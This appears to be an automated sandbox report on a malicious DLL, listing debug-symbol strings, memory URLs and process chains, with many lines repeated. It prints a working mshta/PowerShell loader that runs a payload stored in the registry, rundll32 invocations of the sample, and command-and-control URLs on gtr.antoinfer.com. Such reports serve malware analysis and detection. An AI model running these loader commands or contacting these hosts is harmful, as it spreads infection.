Source: |
Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: fltLib.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: rundll32.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wsspicli.pdb5 source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: propsys.pdb- source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cryptbase.pdb; source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Bed.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp |
Source: |
Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll |
Source: |
Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp |
Source: |
Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp |
Source: powershell.exe, 0000002A.00000002.626923996.00000273E0C30000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: {08A52032-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DFBCEA36BA3DC5EC74.TMP.32.dr |
String found in binary or memory: http://gtr.antoinfer.com/4khtvsQ0u/_2Bibxls4V27IXxwFbLo/MVAeZiN_2BcOXrnrV8V/qJdJNxZ6Bgv5NEeycuU5RT/x |
Source: rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2 |
Source: {08A52036-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr |
String found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2FaVCd |
Source: {08A52034-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DF5A692A62F2D75F35.TMP.32.dr |
String found in binary or memory: http://gtr.antoinfer.com/Pl9Eori10/TWROVDxUXG0e5P8cvyge/ZU2BrrTT9UbiVqqjDG4/pcVLHkjQ_2FTIEKMeI9p0c/u |
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000002A.00000002.610882160.00000273C88F1000.00000004.00000001.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll' |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648 |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 656 |
|
Source: unknown |
Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding |
|
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2 |
|
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2 |
|
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2 |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' |
|
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2 |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2 |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2 |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
Source: |
Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: fltLib.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: rundll32.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wsspicli.pdb5 source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: propsys.pdb- source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cryptbase.pdb; source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Bed.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp |
Source: |
Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll |
Source: |
Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp |
Source: |
Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp |
Source: |
Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp |
Source: |
Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp |
Source: |
Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
